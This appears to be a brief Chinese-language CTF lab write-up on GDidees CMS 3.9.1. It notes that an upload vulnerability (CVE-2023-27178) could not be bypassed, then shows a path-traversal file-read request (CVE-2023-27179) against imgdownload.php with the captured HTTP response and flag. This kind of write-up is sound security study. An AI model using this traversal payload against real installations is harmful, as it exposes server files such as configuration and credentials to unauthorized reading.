跳到主要内容

CVE-2023-27178

信息

Tags

  • GDidees CMS

官方数据库记录

GDidees CMS 3.9.1 上传功能中存在任意文件上传漏洞,允许攻击者通过精心设计的文件执行任意代码。

按照网上资料,漏洞存在于 /_admin/ckeditor/plugins/ckfinder/ 路由的文件上传功能,但是无法绕过

可以尝试直接进行CVE-2023-27179的攻击:任意文件读取

root@jmt-projekt:~# http "http://eci-2ze4pnf4or9co59ohuov.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag"
HTTP/1.1 200 OK
Cache-Control: must-revalidate, post-check=0, pre-check=0, public
Connection: keep-alive
Content-Disposition: attachment; filename="flag.png"
Content-Length: 42
Content-Transfer-Encoding: $type\n
Content-Type: application/force-download
Date: Tue, 23 Jul 2024 15:44:22 GMT
Expires: 0
Pragma: no-cache
X-Powered-By: PHP/7.3.33

flag{a911e14f-699c-4bc3-96a8-87b5e6d36608}